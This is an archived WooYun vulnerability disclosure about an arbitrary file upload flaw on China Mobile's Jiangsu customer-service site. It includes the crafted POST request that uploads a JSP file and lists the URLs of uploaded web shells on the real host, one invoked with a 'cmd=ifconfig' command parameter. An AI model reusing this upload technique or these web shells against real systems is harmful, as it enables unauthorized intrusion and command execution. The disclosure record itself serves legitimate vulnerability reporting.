当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086316

漏洞标题:某省移动主站可被入侵

相关厂商:中国移动

漏洞作者: hack雪花

提交时间:2014-12-07 23:47

修复时间:2015-01-21 23:48

公开时间:2015-01-21 23:48

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-07: 细节已通知厂商并且等待厂商处理中
2014-12-12: 厂商已经确认,细节仅向厂商公开
2014-12-22: 细节向核心白帽子及相关领域专家公开
2015-01-01: 细节向普通白帽子公开
2015-01-11: 细节向实习白帽子公开
2015-01-21: 细节向公众公开

简要描述:

上传导致

详细说明:

客服导致

漏洞证明:

EPX~G4EMD6IUKO{FV7R62%0.jpg

GCUIS{`7W8LM$AJ)AQGFUAO.jpg

9}I)K%2}$`OD7(SJQ9}S8]W.png

域名:js.10086.cn 存在任意文件上传(中国移动网上在线客服,图片处)
------------
详情--------
http://www.js.10086.cn/iRobot/index.jsp?type=1
开启burp抓包,研究了下/iRobot/page/common/fileimg.jsp?flag=success&&suffix=c:\xxxx
是干嘛的?? 修改成jsp试试。。。。

POST /iRobot/page/common/fileimg.jsp?flag=success&&suffix=jsp HTTP/1.1
Host: www.js.10086.cn
Proxy-Connection: keep-alive
Content-Length: 7054
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.js.10086.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuiAm7XOR5qS7Ouie
Referer: http://www.js.10086.cn/iRobot/index.jsp?type=1
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:


D(21Q8{JQ2F]UBW(BG{9$PT.png


修复方案:

http://www.js.10086.cn/iRobot/pic/20141111/13401462424/2014111116384141.jsp
http://js.10086.cn/iRobot/pic/20141012/15751540161/20141012194410263.jsp?cmd=ifconfig
你们懂

版权声明:转载请注明来源 hack雪花@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-12-12 09:09

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。根据测试结果,复杂度和利用难度较高,rank 11

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-08 03:34 | hack雪花 ( 实习白帽子 | Rank:67 漏洞数:18 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    没钱奖励啊

  2. 2014-12-08 08:30 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    @hack雪花 通用?

  3. 2014-12-08 09:55 | hack雪花 ( 实习白帽子 | Rank:67 漏洞数:18 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

  4. 2014-12-08 16:29 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    通用应该会给$的

  5. 2014-12-12 09:22 | ′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @hack雪花 想太多 这个又不是通用

  6. 2015-01-22 01:55 | 背影 ( 路人 | Rank:25 漏洞数:3 )

    @hack雪花 你知道吗你的手机号侧漏了。。。

  7. 2015-01-22 09:04 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    @hack雪花 你知道吗你的手机号侧漏了。。。

  8. 2015-01-22 09:18 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @hack雪花 黑阔,你的顺丰快递...

  9. 2015-01-22 10:35 | hack雪花 ( 实习白帽子 | Rank:67 漏洞数:18 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    日我等小白,求带